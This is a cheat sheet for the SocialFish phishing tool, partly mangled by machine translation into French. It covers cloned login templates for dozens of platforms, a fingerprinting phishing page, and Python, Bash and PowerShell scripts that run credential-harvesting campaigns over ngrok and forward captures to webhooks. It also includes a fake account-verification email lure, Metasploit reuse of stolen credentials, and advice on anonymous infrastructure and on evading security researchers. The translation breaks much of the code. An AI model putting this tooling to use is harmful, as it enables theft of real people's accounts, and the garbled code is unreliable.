SocialFish hameçonnage Tool aide-mémoire
Overview
SocialFish is an advanced hameçonnage tool and information collector developed by UndeadSec. It specializes in social media hameçonnage attacks and comprehensive information gathering, providing automated hameçonnage page generation, real-time credential harvesting, and detailed victim profiling. SocialFish includes built-in templates for popular social media platforms and supports custom hameçonnage page creation.
⚠️ Warning: This tool is intended for authorized tests de pénétration and équipe rouge exercises only. Ensure you have proper autorisation before using against any cible.
Installation
Prerequisites
# Install Python 3.6+ and pip
sudo apt update
sudo apt install -y python3 python3-pip git
# Install system dependencies
sudo apt install -y build-essential libssl-dev libffi-dev python3-dev
# Verify Python Installation
python3 --version
Installation from GitHub
# Clone SocialFish repository
git clone https://github.com/UndeadSec/SocialFish.git
cd SocialFish
# Install requirements
pip3 install -r requirements.txt
# Make executable
chmod +x SocialFish.py
Docker Installation
# Clone repository
git clone https://github.com/UndeadSec/SocialFish.git
cd SocialFish
# Build Docker image
docker build -t socialfish .
# Run SocialFish container
docker run -it --rm -p 5000:5000 socialfish
# Run with persistent data
docker run -it --rm -p 5000:5000 -v $(pwd)/data:/app/data socialfish
Manual Dependencies Installation
# Install individual dependencies
pip3 install flask
pip3 install requests
pip3 install beautifulsoup4
pip3 install colorama
pip3 install pyfiglet
pip3 install urllib3
# Install additional tools
sudo apt install -y ngrok # For public tunneling
sudo apt install -y apache2 # Alternative web server
Basic utilisation
Starting SocialFish
# Start SocialFish with default settings
python3 SocialFish.py
# Start with custom port
python3 SocialFish.py --port 8080
# Start with custom hôte
python3 SocialFish.py --hôte 0.0.0.0
# Start in debug mode
python3 SocialFish.py --debug
# Start with custom template directory
python3 SocialFish.py --templates /path/to/templates
commande Line options
# SocialFish commande line options
python3 SocialFish.py --help
options:
--port port port to run the server (default: 5000)
--hôte hôte hôte to bind the server (default: 127.0.0.1)
--debug Enable debug mode
--templates DIR Custom templates directory
--output DIR Output directory for logs and data
--ngrok Enable ngrok tunneling
--ssl Enable SSL/HTTPS
Web Interface Access
# Access SocialFish web interface
http://localhôte:5000
# Access admin panel
http://localhôte:5000/admin
# View captured data
http://localhôte:5000/logs
# Download captured data
http://localhôte:5000/download
Built-in Templates
Social Media Platforms
# Available social media templates
1. Facebook Login
2. Instagram Login
3. Twitter Login
4. LinkedIn Login
5. Snapchat Login
6. TikTok Login
7. WhatsApp Web
8. Telegram Web
9. Discord Login
10. Reddit Login
Email and Cloud services
# Email service templates
11. Gmail Login
12. Outlook Login
13. Yahoo Mail Login
14. ProtonMail Login
# Cloud service templates
15. Google Drive
16. Dropbox Login
17. OneDrive Login
18. iCloud Login
Professional and Business
# Business platform templates
19. Microsoft Teams
20. Slack Login
21. Zoom Login
22. Skype Login
23. Adobe Creative Cloud
24. Salesforce Login
Gaming and Entertainment
# Gaming platform templates
25. Steam Login
26. Epic Games
27. PlayStation Network
28. Xbox Live
29. Twitch Login
30. YouTube Login
Financial and Shopping
# Financial service templates
31. PayPal Login
32. Amazon Login
33. eBay Login
34. Netflix Login
35. Spotify Login
Template Management
Using Built-in Templates
# Select template from web interface
1. Access http://localhôte:5000
2. Choose cible platform
3. Configure template settings
4. Generate hameçonnage page
5. Start campaign
# commande line template selection
python3 SocialFish.py --template facebook
python3 SocialFish.py --template instagram
python3 SocialFish.py --template gmail
Custom Template Creation
<!DOCTYPE html>
<html>
<head>
<title>\\\\{\\\\{title\\\\}\\\\}</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link rel="stylesheet" href="\\\\{\\\\{css_file\\\\}\\\\}">
</head>
<body>
<div class="login-container">
<div class="logo">
<img src="\\\\{\\\\{logo_url\\\\}\\\\}" alt="Logo">
</div>
<form method="POST" action="/login">
<div class="form-group">
<input type="text" name="nom d'utilisateur" placeholder="nom d'utilisateur or Email" required>
</div>
<div class="form-group">
<input type="mot de passe" name="mot de passe" placeholder="mot de passe" required>
</div>
<div class="form-group">
<button type="submit">Sign In</button>
</div>
</form>
<div class="additional-info">
<p>Forgot your mot de passe? <a href="#" onclick="collectInfo()">Reset here</a></p>
</div>
</div>
<script>
function collectInfo() \\\\{
// Additional information collection
var userAgent = navigator.userAgent;
var platform = navigator.platform;
var language = navigator.language;
// Send data to server
fetch('/collect', \\\\{
method: 'POST',
headers: \\\\{
'Content-Type': 'application/json',
\\\\},
body: JSON.stringify(\\\\{
userAgent: userAgent,
platform: platform,
language: language,
timestamp: new Date().toISOString()
\\\\})
\\\\});
\\\\}
// Automatic information collection
window.onload = function() \\\\{
collectInfo();
\\\\};
</script>
</body>
</html>
Template configuration
\\\\{
"template_name": "custom_platform",
"display_name": "Custom Platform Login",
"Description": "Custom hameçonnage template for specific platform",
"author": "Security Tester",
"version": "1.0",
"cible_url": "https://custom-platform.com/login",
"redirect_url": "https://custom-platform.com/dashboard",
"files": \\\\{
"html": "custom_template.html",
"css": "custom_styles.css",
"js": "custom_script.js",
"images": ["logo.png", "background.jpg"]
\\\\},
"form_fields": [
\\\\{
"name": "nom d'utilisateur",
"type": "text",
"required": true,
"label": "nom d'utilisateur or Email"
\\\\},
\\\\{
"name": "mot de passe",
"type": "mot de passe",
"required": true,
"label": "mot de passe"
\\\\}
],
"additional_data": [
"user_agent",
"ip_address",
"geolocation",
"browser_info",
"screen_resolution"
]
\\\\}
Campaign Management
Creating Campaigns
# Web interface campaign creation
1. Access admin panel: http://localhôte:5000/admin
2. Select "New Campaign"
3. Choose template
4. Configure settings:
- Campaign name
- cible URL
- Redirect URL
- Data collection options
5. Generate hameçonnage URL
6. Start campaign
Campaign configuration options
# Campaign configuration exemple
campaign_config = \\\\{
"name": "Social Media Test Campaign",
"template": "facebook",
"cible_platform": "Facebook",
"redirect_url": "https://facebook.com",
"data_collection": \\\\{
"identifiants": True,
"browser_info": True,
"geolocation": True,
"device_info": True,
"session_data": True
\\\\},
"security": \\\\{
"ip_filtering": ["192.168.1.0/24"],
"user_agent_filtering": True,
"geo_filtering": ["US", "CA", "GB"],
"time_restrictions": \\\\{
"start_time": "09:00",
"end_time": "17:00",
"timezone": "UTC"
\\\\}
\\\\},
"notifications": \\\\{
"webhook_url": "https://your-server.com/webhook",
"email_alerts": True,
"slack_integration": True
\\\\}
\\\\}
Advanced Campaign Features
# Multi-stage hameçonnage campaign
multi_stage_config = \\\\{
"stages": [
\\\\{
"stage": 1,
"template": "email_verification",
"Description": "Email verification page",
"data_collection": ["email", "browser_info"],
"redirect_to_stage": 2
\\\\},
\\\\{
"stage": 2,
"template": "facebook_login",
"Description": "Facebook login page",
"data_collection": ["identifiants", "session_data"],
"redirect_to_stage": 3
\\\\},
\\\\{
"stage": 3,
"template": "2fa_verification",
"Description": "Two-factor authentification",
"data_collection": ["2fa_code", "device_info"],
"redirect_url": "https://facebook.com"
\\\\}
]
\\\\}
Data Collection and Analysis
Captured Data Types
# Credential data
- nom d'utilisateur/Email
- mot de passe
- Security questions
- PIN codes
- 2FA jetons
# Browser information
- User Agent
- Browser version
- Installed plugins
- Screen resolution
- Operating system
# Network information
- IP address
- Geolocation
- ISP information
- Proxy detection
- VPN detection
# Device information
- Device type
- Hardware specs
- Mobile device info
- Battery level
- Network type
# Behavioral data
- Mouse movements
- cléstroke patterns
- Time spent on page
- Click patterns
- Form interaction
Real-time Monitoring
# Real-time data monitoring script
import requests
import json
import time
from datetime import datetime
class SocialFishMonitor:
def __init__(self, base_url="http://localhôte:5000"):
self.base_url = base_url
self.last_check = datetime.now()
def get_captured_data(self):
"""Retrieve captured data from SocialFish"""
try:
response = requests.get(f"\\\\{self.base_url\\\\}/api/data")
if response.status_code == 200:
return response.json()
except Exception as e:
print(f"Error retrieving data: \\\\{e\\\\}")
return []
def monitor_new_captures(self):
"""Monitor for new captured data"""
while True:
data = self.get_captured_data()
new_captures = [
item for item in data
if datetime.fromisoformat(item['timestamp']) > self.last_check
]
for capture in new_captures:
self.processus_new_capture(capture)
if new_captures:
self.last_check = datetime.now()
time.sleep(10)
def processus_new_capture(self, capture):
"""processus new captured data"""
print(f"[+] New capture: \\\\{capture['type']\\\\}")
print(f" IP: \\\\{capture.get('ip_address', 'Unknown')\\\\}")
print(f" User Agent: \\\\{capture.get('user_agent', 'Unknown')\\\\}")
print(f" Timestamp: \\\\{capture['timestamp']\\\\}")
# Send notifications
self.send_notification(capture)
# Export data
self.export_capture(capture)
def send_notification(self, capture):
"""Send notification for new capture"""
webhook_url = "https://your-server.com/webhook"
charge utile = \\\\{
"text": f"New SocialFish capture from \\\\{capture.get('ip_address', 'Unknown')\\\\}",
"capture_data": capture
\\\\}
try:
requests.post(webhook_url, json=charge utile)
except Exception as e:
print(f"Failed to send notification: \\\\{e\\\\}")
def export_capture(self, capture):
"""Export captured data"""
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
filename = f"capture_\\\\{timestamp\\\\}.json"
with open(filename, 'w') as f:
json.dump(capture, f, indent=2)
print(f"[+] Data exported to: \\\\{filename\\\\}")
# utilisation
monitor = SocialFishMonitor()
monitor.monitor_new_captures()
Data Analysis Tools
# Data analysis and reporting
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
from collections import Counter
class SocialFishAnalyzer:
def __init__(self, data_file):
self.data = pd.read_json(data_file)
def analyze_geographic_distribution(self):
"""Analyze geographic distribution of victims"""
country_counts = Counter(self.data['country'])
plt.figure(figsize=(12, 6))
countries = list(country_counts.clés())[:10]
counts = list(country_counts.values())[:10]
plt.bar(countries, counts)
plt.title('Geographic Distribution of hameçonnage Victims')
plt.xlabel('Country')
plt.ylabel('Number of Victims')
plt.xticks(rotation=45)
plt.tight_layout()
plt.savefig('geographic_distribution.png')
plt.show()
def analyze_browser_utilisation(self):
"""Analyze browser utilisation patterns"""
browsers = []
for ua in self.data['user_agent']:
if 'Chrome' in ua:
browsers.append('Chrome')
elif 'Firefox' in ua:
browsers.append('Firefox')
elif 'Safari' in ua:
browsers.append('Safari')
elif 'Edge' in ua:
browsers.append('Edge')
else:
browsers.append('Other')
browser_counts = Counter(browsers)
plt.figure(figsize=(8, 8))
plt.pie(browser_counts.values(), labels=browser_counts.clés(), autopct='%1.1f%%')
plt.title('Browser utilisation Distribution')
plt.savefig('browser_distribution.png')
plt.show()
def analyze_time_patterns(self):
"""Analyze time-based patterns"""
self.data['timestamp'] = pd.to_datetime(self.data['timestamp'])
self.data['hour'] = self.data['timestamp'].dt.hour
hourly_counts = self.data['hour'].value_counts().sort_index()
plt.figure(figsize=(12, 6))
plt.plot(hourly_counts.index, hourly_counts.values, marker='o')
plt.title('hameçonnage Activity by Hour of Day')
plt.xlabel('Hour of Day')
plt.ylabel('Number of Victims')
plt.grid(True)
plt.savefig('time_patterns.png')
plt.show()
def generate_report(self):
"""Generate comprehensive analysis report"""
report = \\\\{
'total_victims': len(self.data),
'unique_ips': self.data['ip_address'].nunique(),
'top_countries': dict(Counter(self.data['country']).most_common(5)),
'success_rate': len(self.data[self.data['identifiants_captured'] == True]) / len(self.data) * 100,
'average_time_on_page': self.data['time_on_page'].mean(),
'mobile_percentage': len(self.data[self.data['device_type'] == 'mobile']) / len(self.data) * 100
\\\\}
return report
# utilisation
analyzer = SocialFishAnalyzer('captured_data.json')
report = analyzer.generate_report()
print(json.dumps(report, indent=2))
Automation and Scripting
Python Automation Script
#!/usr/bin/env python3
# SocialFish automation script
import requests
import json
import time
import subprocessus
import threading
from datetime import datetime
class SocialFishAutomation:
def __init__(self, hôte="localhôte", port=5000):
self.base_url = f"http://\\\\{hôte\\\\}:\\\\{port\\\\}"
self.processus = None
self.monitoring = False
def start_socialfish(self, template="facebook"):
"""Start SocialFish with specified template"""
cmd = [
"python3", "SocialFish.py",
"--hôte", "0.0.0.0",
"--port", str(self.port),
"--template", template
]
self.processus = subprocessus.Popen(cmd, stdout=subprocessus.PIPE, stderr=subprocessus.PIPE)
# Wait for server to start
time.sleep(10)
# Verify server is running
try:
response = requests.get(self.base_url, timeout=5)
if response.status_code == 200:
print("[+] SocialFish started successfully")
return True
except:
pass
print("[-] Failed to start SocialFish")
return False
def create_campaign(self, config):
"""Create new hameçonnage campaign"""
try:
response = requests.post(f"\\\\{self.base_url\\\\}/api/campaign", json=config)
if response.status_code == 200:
campaign_data = response.json()
print(f"[+] Campaign created: \\\\{campaign_data['url']\\\\}")
return campaign_data
except Exception as e:
print(f"[-] Failed to create campaign: \\\\{e\\\\}")
return None
def get_hameçonnage_url(self, campaign_id):
"""Get hameçonnage URL for campaign"""
try:
response = requests.get(f"\\\\{self.base_url\\\\}/api/campaign/\\\\{campaign_id\\\\}")
if response.status_code == 200:
return response.json()['url']
except Exception as e:
print(f"[-] Failed to get hameçonnage URL: \\\\{e\\\\}")
return None
def monitor_captures(self):
"""Monitor captured data in real-time"""
self.monitoring = True
last_count = 0
while self.monitoring:
try:
response = requests.get(f"\\\\{self.base_url\\\\}/api/captures")
if response.status_code == 200:
captures = response.json()
current_count = len(captures)
if current_count > last_count:
new_captures = captures[last_count:]
for capture in new_captures:
self.processus_capture(capture)
last_count = current_count
time.sleep(5)
except Exception as e:
print(f"[-] Monitoring error: \\\\{e\\\\}")
time.sleep(10)
def processus_capture(self, capture):
"""processus new captured data"""
print(f"[+] New victim: \\\\{capture.get('ip_address', 'Unknown')\\\\}")
# Extract identifiants if available
if 'identifiants' in capture:
nom d'utilisateur = capture['identifiants'].get('nom d'utilisateur', 'N/A')
mot de passe = capture['identifiants'].get('mot de passe', 'N/A')
print(f" nom d'utilisateur: \\\\{nom d'utilisateur\\\\}")
print(f" mot de passe: \\\\{'*' * len(mot de passe)\\\\}")
# Extract device information
if 'device_info' in capture:
device = capture['device_info']
print(f" Device: \\\\{device.get('type', 'Unknown')\\\\} - \\\\{device.get('os', 'Unknown')\\\\}")
print(f" Browser: \\\\{device.get('browser', 'Unknown')\\\\}")
# Send notification
self.send_notification(capture)
# Export data
self.export_capture(capture)
def send_notification(self, capture):
"""Send notification for new capture"""
# Slack notification
slack_webhook = "https://hooks.slack.com/services/YOUR/SLACK/WEBHOOK"
message = \\\\{
"text": f"🎣 New SocialFish Capture",
"attachments": [
\\\\{
"color": "good",
"fields": [
\\\\{
"title": "IP Address",
"value": capture.get('ip_address', 'Unknown'),
"short": True
\\\\},
\\\\{
"title": "Country",
"value": capture.get('country', 'Unknown'),
"short": True
\\\\},
\\\\{
"title": "User Agent",
"value": capture.get('user_agent', 'Unknown')[:50] + "...",
"short": False
\\\\}
]
\\\\}
]
\\\\}
try:
requests.post(slack_webhook, json=message)
except Exception as e:
print(f"[-] Failed to send Slack notification: \\\\{e\\\\}")
def export_capture(self, capture):
"""Export captured data to file"""
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
filename = f"socialfish_capture_\\\\{timestamp\\\\}.json"
with open(filename, 'w') as f:
json.dump(capture, f, indent=2)
print(f"[+] Data exported to: \\\\{filename\\\\}")
def setup_ngrok_tunnel(self):
"""Setup ngrok tunnel for public access"""
try:
# Start ngrok tunnel
ngrok_processus = subprocessus.Popen([
"ngrok", "http", str(self.port)
], stdout=subprocessus.PIPE, stderr=subprocessus.PIPE)
time.sleep(5)
# Get public URL
response = requests.get("http://localhôte:4040/api/tunnels")
if response.status_code == 200:
tunnels = response.json()['tunnels']
if tunnels:
public_url = tunnels[0]['public_url']
print(f"[+] Public URL: \\\\{public_url\\\\}")
return public_url
except Exception as e:
print(f"[-] Failed to setup ngrok tunnel: \\\\{e\\\\}")
return None
def automated_campaign(self, templates, duration_hours=24):
"""Run automated multi-template campaign"""
print("[+] Starting automated SocialFish campaign...")
# Setup ngrok tunnel
public_url = self.setup_ngrok_tunnel()
campaigns = []
# Create campaigns for each template
for template in templates:
config = \\\\{
"template": template,
"name": f"Auto Campaign - \\\\{template\\\\}",
"redirect_url": f"https://\\\\{template.lower()\\\\}.com",
"data_collection": \\\\{
"identifiants": True,
"browser_info": True,
"geolocation": True
\\\\}
\\\\}
campaign = self.create_campaign(config)
if campaign:
campaigns.append(campaign)
print(f"[+] \\\\{template\\\\} campaign URL: \\\\{public_url\\\\}\\\\{campaign['path']\\\\}")
# Start monitoring
monitor_thread = threading.thread(cible=self.monitor_captures)
monitor_thread.démon = True
monitor_thread.start()
# Run for specified duration
print(f"[+] Campaign running for \\\\{duration_hours\\\\} hours...")
time.sleep(duration_hours * 3600)
# Stop monitoring
self.monitoring = False
print("[+] Campaign completed")
return campaigns
# utilisation exemple
def main():
automation = SocialFishAutomation()
# Start SocialFish
if automation.start_socialfish():
# Run automated campaign with multiple templates
templates = ["facebook", "instagram", "gmail", "linkedin"]
campaigns = automation.automated_campaign(templates, duration_hours=1)
print(f"[+] Completed \\\\{len(campaigns)\\\\} campaigns")
if __name__ == "__main__":
main()
Bash Automation Script
#!/bin/bash
# SocialFish bash automation script
SOCIALFISH_DIR="/path/to/SocialFish"
hôte="0.0.0.0"
port="5000"
TEMPLATE="facebook"
DURATION="3600" # 1 hour in seconds
# Function to start SocialFish
start_socialfish() \\\\{
echo "[+] Starting SocialFish..."
cd "$SOCIALFISH_DIR"
python3 SocialFish.py --hôte "$hôte" --port "$port" --template "$TEMPLATE" &
SOCIALFISH_PID=$!
# Wait for server to start
sleep 10
# Check if server is running
if curl -s "http://localhôte:$port" > /dev/null; then
echo "[+] SocialFish started successfully (PID: $SOCIALFISH_PID)"
return 0
else
echo "[-] Failed to start SocialFish"
return 1
fi
\\\\}
# Function to setup ngrok tunnel
setup_ngrok() \\\\{
echo "[+] Setting up ngrok tunnel..."
ngrok http "$port" &
NGROK_PID=$!
sleep 5
# Get public URL
PUBLIC_URL=$(curl -s http://localhôte:4040/api/tunnels|jq -r '.tunnels[0].public_url')
if [ "$PUBLIC_URL" != "null" ] && [ -n "$PUBLIC_URL" ]; then
echo "[+] Public URL: $PUBLIC_URL"
echo "$PUBLIC_URL" > ngrok_url.txt
return 0
else
echo "[-] Failed to get ngrok URL"
return 1
fi
\\\\}
# Function to monitor captures
monitor_captures() \\\\{
echo "[+] Starting capture monitoring..."
while true; do
# Check for new captures
CAPTURE_COUNT=$(curl -s "http://localhôte:$port/api/captures"|jq length)
if [ "$CAPTURE_COUNT" -gt 0 ]; then
echo "[+] $CAPTURE_COUNT capture(s) detected"
# Export latest capture
TIMESTAMP=$(date +"%Y%m%d_%H%M%S")
curl -s "http://localhôte:$port/api/captures" > "captures_$TIMESTAMP.json"
echo "[+] Captures exported to: captures_$TIMESTAMP.json"
fi
sleep 30
done
\\\\}
# Function to cleanup
cleanup() \\\\{
echo "[+] Cleaning up..."
if [ -n "$SOCIALFISH_PID" ]; then
kill "$SOCIALFISH_PID" 2>/dev/null
echo "[+] SocialFish stopped"
fi
if [ -n "$NGROK_PID" ]; then
kill "$NGROK_PID" 2>/dev/null
echo "[+] Ngrok tunnel stopped"
fi
exit 0
\\\\}
# Set trap for cleanup
trap cleanup SIGINT SIGTERM
# Main execution
main() \\\\{
echo "[+] SocialFish Automation Script"
echo "[+] Template: $TEMPLATE"
echo "[+] Duration: $DURATION seconds"
# Start SocialFish
if start_socialfish; then
# Setup ngrok tunnel
if setup_ngrok; then
# Start monitoring in background
monitor_captures &
MONITOR_PID=$!
# Run for specified duration
echo "[+] Campaign running for $DURATION seconds..."
sleep "$DURATION"
# Stop monitoring
kill "$MONITOR_PID" 2>/dev/null
echo "[+] Campaign completed"
fi
fi
cleanup
\\\\}
# Execute main function
main
PowerShell Automation
# SocialFish PowerShell automation script
param(
[string]$SocialFishPath = "C:\Tools\SocialFish",
[string]$hôte = "0.0.0.0",
[int]$port = 5000,
[string]$Template = "facebook",
[int]$DurationMinutes = 60
)
function Start-SocialFish \\\\{
param(
[string]$Path,
[string]$hôte,
[int]$port,
[string]$Template
)
Write-hôte "[+] Starting SocialFish..." -ForegroundColor Green
Set-Location $Path
$processus = Start-processus -FilePath "python" -ArgumentList @(
"SocialFish.py",
"--hôte", $hôte,
"--port", $port,
"--template", $Template
) -PassThru -WindowStyle Hidden
# Wait for server to start
Start-Sleep -Seconds 10
# Check if server is running
try \\\\{
$response = Invoke-WebRequest -Uri "http://localhôte:$port" -TimeoutSec 5
if ($response.StatusCode -eq 200) \\\\{
Write-hôte "[+] SocialFish started successfully (PID: $($processus.Id))" -ForegroundColor Green
return $processus
\\\\}
\\\\}
catch \\\\{
Write-hôte "[-] Failed to start SocialFish" -ForegroundColor Red
return $null
\\\\}
\\\\}
function Start-NgrokTunnel \\\\{
param([int]$port)
Write-hôte "[+] Setting up ngrok tunnel..." -ForegroundColor Green
$ngrokprocessus = Start-processus -FilePath "ngrok" -ArgumentList @("http", $port) -PassThru -WindowStyle Hidden
Start-Sleep -Seconds 5
try \\\\{
$tunnelInfo = Invoke-RestMethod -Uri "http://localhôte:4040/api/tunnels"
$publicUrl = $tunnelInfo.tunnels[0].public_url
if ($publicUrl) \\\\{
Write-hôte "[+] Public URL: $publicUrl" -ForegroundColor Green
$publicUrl|Out-File -FilePath "ngrok_url.txt"
return @\\\\{
processus = $ngrokprocessus
Url = $publicUrl
\\\\}
\\\\}
\\\\}
catch \\\\{
Write-hôte "[-] Failed to get ngrok URL" -ForegroundColor Red
\\\\}
return $null
\\\\}
function Monitor-Captures \\\\{
param(
[int]$port,
[int]$DurationMinutes
)
Write-hôte "[+] Starting capture monitoring for $DurationMinutes minutes..." -ForegroundColor Green
$endTime = (Get-Date).AddMinutes($DurationMinutes)
$lastCaptureCount = 0
while ((Get-Date) -lt $endTime) \\\\{
try \\\\{
$captures = Invoke-RestMethod -Uri "http://localhôte:$port/api/captures"
$currentCount = $captures.Count
if ($currentCount -gt $lastCaptureCount) \\\\{
$newCaptures = $currentCount - $lastCaptureCount
Write-hôte "[+] $newCaptures new capture(s) detected" -ForegroundColor Yellow
# Export captures
$timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
$filename = "captures_$timestamp.json"
| $captures | ConvertTo-Json -Depth 10 | Out-File -FilePath $filename |
Write-hôte "[+] Captures exported to: $filename" -ForegroundColor Green
$lastCaptureCount = $currentCount
\\\\}
\\\\}
catch \\\\{
Write-hôte "[-] Error monitoring captures: $_" -ForegroundColor Red
\\\\}
Start-Sleep -Seconds 30
\\\\}
Write-hôte "[+] Monitoring completed" -ForegroundColor Green
\\\\}
function Stop-processuses \\\\{
param(
[System.Diagnostics.processus]$SocialFishprocessus,
[System.Diagnostics.processus]$Ngrokprocessus
)
Write-hôte "[+] Cleaning up..." -ForegroundColor Green
if ($SocialFishprocessus -and !$SocialFishprocessus.HasExited) \\\\{
$SocialFishprocessus.Kill()
Write-hôte "[+] SocialFish stopped" -ForegroundColor Green
\\\\}
if ($Ngrokprocessus -and !$Ngrokprocessus.HasExited) \\\\{
$Ngrokprocessus.Kill()
Write-hôte "[+] Ngrok tunnel stopped" -ForegroundColor Green
\\\\}
\\\\}
# Main execution
try \\\\{
Write-hôte "[+] SocialFish PowerShell Automation" -ForegroundColor Cyan
Write-hôte "[+] Template: $Template" -ForegroundColor Cyan
Write-hôte "[+] Duration: $DurationMinutes minutes" -ForegroundColor Cyan
# Start SocialFish
$socialFishprocessus = Start-SocialFish -Path $SocialFishPath -hôte $hôte -port $port -Template $Template
if ($socialFishprocessus) \\\\{
# Setup ngrok tunnel
$ngrokInfo = Start-NgrokTunnel -port $port
if ($ngrokInfo) \\\\{
# Monitor captures
Monitor-Captures -port $port -DurationMinutes $DurationMinutes
# Cleanup
Stop-processuses -SocialFishprocessus $socialFishprocessus -Ngrokprocessus $ngrokInfo.processus
\\\\}
else \\\\{
Stop-processuses -SocialFishprocessus $socialFishprocessus
\\\\}
\\\\}
\\\\}
catch \\\\{
Write-hôte "[-] Script error: $_" -ForegroundColor Red
\\\\}
finally \\\\{
Write-hôte "[+] Script completed" -ForegroundColor Green
\\\\}
Integration with Other Tools
GoPhish Integration
# Integrate SocialFish with GoPhish for email delivery
import requests
import json
class GoPhishSocialFishIntegration:
def __init__(self, gophish_url, gophish_api_clé, socialfish_url):
self.gophish_url = gophish_url
self.gophish_api_clé = gophish_api_clé
self.socialfish_url = socialfish_url
self.headers = \\\\{
'autorisation': f'Bearer \\\\{gophish_api_clé\\\\}',
'Content-Type': 'application/json'
\\\\}
def create_gophish_campaign(self, socialfish_campaign_url):
"""Create GoPhish campaign with SocialFish URL"""
campaign_data = \\\\{
"name": "SocialFish Integration Campaign",
"template": \\\\{
"name": "Social Media Login Required",
"subject": "Action Required: Verify Your Account",
"html": f"""
<html>
<body>
<h2>Account Verification Required</h2>
<p>We've detected unusual activity on your account. Please verify your identity to continue using our services.</p>
<p><a href="\\\\{socialfish_campaign_url\\\\}" style="background-color: #4CAF50; color: white; padding: 14px 20px; text-decoration: none; display: inline-block;">Verify Account</a></p>
<p>If you did not request this verification, please ignore this email.</p>
</body>
</html>
""",
"text": f"Please verify your account by visiting: \\\\{socialfish_campaign_url\\\\}"
\\\\},
"page": \\\\{
"name": "Social Media Landing",
"html": f'<script>window.location.href="\\\\{socialfish_campaign_url\\\\}";</script>',
"redirect_url": socialfish_campaign_url
\\\\},
"smtp": \\\\{
"name": "Default SMTP",
"hôte": "smtp.gmail.com:587",
"nom d'utilisateur": "your_email@gmail.com",
"mot de passe": "your_app_mot de passe"
\\\\},
"groups": [
\\\\{
"name": "cible Group",
"cibles": [
\\\\{"email": "cible1@exemple.com", "first_name": "John", "last_name": "Doe"\\\\},
\\\\{"email": "cible2@exemple.com", "first_name": "Jane", "last_name": "Smith"\\\\}
]
\\\\}
]
\\\\}
response = requests.post(
f"\\\\{self.gophish_url\\\\}/api/campaigns",
headers=self.headers,
json=campaign_data
)
return response.json()
# utilisation
integration = GoPhishSocialFishIntegration(
"http://localhôte:3333",
"your_gophish_api_clé",
"http://your-socialfish-url.com"
)
campaign = integration.create_gophish_campaign("http://your-socialfish-url.com/facebook")
SET Integration
# ingénierie sociale Toolkit integration
# Use SET for charge utile delivery after credential capture
# SET configuration for SocialFish integration
echo "
[+] SET Integration with SocialFish
1. Use SocialFish for credential harvesting
2. Use SET for charge utile delivery post-compromise
3. Combine social media hameçonnage with logiciel malveillant delivery
"
# exemple SET charge utile generation
setoolkit
# Select: Social-Engineering Attacks
# Select: Website Attack Vectors
# Select: Credential Harvester Attack Method
# Select: Custom Import
# Import SocialFish captured identifiants
Metasploit Integration
# Use captured identifiants in Metasploit modules
# After SocialFish captures identifiants, use them for further exploitation
# exemple: Use captured email identifiants
use auxiliary/scanner/http/owa_login
set RhôteS cible-mail-server.com
set nom d'utilisateur captured_nom d'utilisateur@company.com
set mot de passe captured_mot de passe
run
# exemple: Use captured social media jetons
use auxiliary/gather/facebook_api
set ACCESS_jeton captured_facebook_jeton
run
Operational Security
Infrastructure Security
# Use VPS with anonymous payment
# Implement proxy chains
# Use domain fronting
# Regular infrastructure rotation
# exemple secure deployment
# 1. Purchase VPS with cryptocurrency
# 2. Setup through Tor/VPN
# 3. Use legitimate domain names
# 4. Implement SSL certificats
# 5. Configure proper logging
Traffic Obfuscation
# Use legitimate SSL certificats
# Implement realistic timing delays
# Use common ports (80, 443)
# Mimic legitimate traffic patterns
# exemple nginx configuration for traffic obfuscation
server \\\\{
listen 443 ssl;
server_name legitimate-looking-domain.com;
ssl_certificat /path/to/legitimate/cert.pem;
ssl_certificat_clé /path/to/legitimate/clé.pem;
location / \\\\{
proxy_pass http://localhôte:5000;
proxy_set_header hôte $hôte;
proxy_set_header X-Real-IP $remote_addr;
\\\\}
\\\\}
Anti-Detection Measures
# Implement anti-detection features
anti_detection_config = \\\\{
"user_agent_filtering": True,
"ip_geolocation_filtering": True,
"security_tool_detection": True,
"honeypot_detection": True,
"timing_randomization": True,
"content_randomization": True
\\\\}
# exemple anti-detection implementation
def detect_security_tools(user_agent, ip_address):
"""Detect security tools and researchers"""
security_indicators = [
'curl', 'wget', 'python-requests', 'scanner',
'bot', 'crawler', 'security', 'research'
]
for indicator in security_indicators:
if indicator.lower() in user_agent.lower():
return True
# Check for known security company IP ranges
security_ip_ranges = [
'192.168.1.0/24', # exemple security company range
'10.0.0.0/8' # exemple research network
]
# Implementation would check IP against ranges
return False
dépannage
Common Issues
# port already in use
sudo netstat -tulpn|grep :5000
sudo kill -9 $(sudo lsof -t -i:5000)
# Python dependency issues
pip3 install --upgrade -r requirements.txt
# Template not loading
# Check template file permissions
# Verify template syntaxe
# Check Flask template directory
# Ngrok tunnel issues
# Check ngrok authentification
# Verify port forwarding
# Test local connectivity first
Debug Mode
# Enable debug logging
python3 SocialFish.py --debug
# Check Flask logs
tail -f socialfish.log
# Test template rendering
curl -v http://localhôte:5000/facebook
# Verify API endpoints
curl http://localhôte:5000/api/captures
Best Practices
Campaign Planning
- cible research: Understand cible demographics and social media utilisation
- Template selection: Choose appropriate templates for cible audience
- Infrastructure setup: Use secure and anonymous hôteing
- Testing: Thoroughly test templates before deployment
- Monitoring: Implement real-time capture monitoring
Legal and Ethical Considerations
# Authorized testing only
# Obtain proper written autorisation
# Follow responsible disclosure
# Protect captured data
# Document all activities
# Data protection measures
# Encrypt captured identifiants
# Secure data transmission
# Implement data retention policies
# Regular security audits
Performance Optimization
# Optimize for high traffic
# Use CDN for static content
# Implement caching
# Monitor server resources
# Scale horizontally if needed
# exemple performance monitoring
htop
iotop
netstat -tulpn
df -h
Resources
- SocialFish GitHub Repository
- UndeadSec Security Research
- Flask documentation
- OWASP ingénierie sociale Guide
- Anti-hameçonnage Working Group
This aide-mémoire provides a comprehensive reference for using SocialFish hameçonnage tool. Always ensure you have proper autorisation before conducting hameçonnage simulations or tests de pénétration.